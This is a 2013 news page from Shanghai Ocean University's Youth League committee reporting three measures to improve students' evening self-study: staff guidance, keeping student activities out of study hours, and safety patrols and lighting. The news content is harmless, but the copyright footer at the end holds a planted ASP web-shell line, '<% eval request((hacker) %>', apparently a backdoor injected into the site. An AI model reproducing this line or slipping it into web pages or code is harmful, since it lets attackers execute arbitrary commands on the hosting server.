当前位置:共青团上海海洋大学委员会 >> 理论学习 >> 时政热点 >> 正文  
站内信息搜索:
“即知即改”系列报道之六:“三项措施”完善学生晚自修制度
[2013年11月12日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

   教育实践活动开展以来,针对师生反映的晚自修方面存在的问题,学校相关职能部门、各学院积极开展调研,着力整改,通过采取“三项措施”积极完善学生晚自修制度。

   一是加强指导。学生处、教务处等职能部门积极加强与学院沟通,强调学院要高度重视新生晚自习工作,多倾听老师的想法,操作时注意方式方法,社会工作量和任务考核方面适当考虑,根据不同学院实际,进一步完善晚自习方案,满足大多数同学的需求。同时,各个学院结合学生专业,充分发挥老师的积极作用,做到晚自习全程教师指导。

   二是注重引导。针对学生活动与晚自修时间冲突的情况,各学院对各级学生组织、社团的活动进行引导,建议学生以晚自习为主,需要学生参加的活动能够在不晚自习的周二下午、晚上或者平日晚上20:30分以后进行。加强学生党员、干部队伍建设,切实发挥学生骨干队伍在晚自修中的带头和示范作用。

    三是强化安全保障。针对晚自修教室与学生宿舍距离较远实际,要求学院在学生中召开主题班会,加强学生的安全防范意识。保卫部门加强晚间的值班和巡逻,后勤管理部门根据实际情况,在校园中扩充照明设备。

 

关闭窗口

上一篇:“即知即改”系列报道之五:加强课堂教学管理,推进教风学风建设

下一篇:“即知即改”系列报道之七:转“点”为“线”,完善学生就业指导机制
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>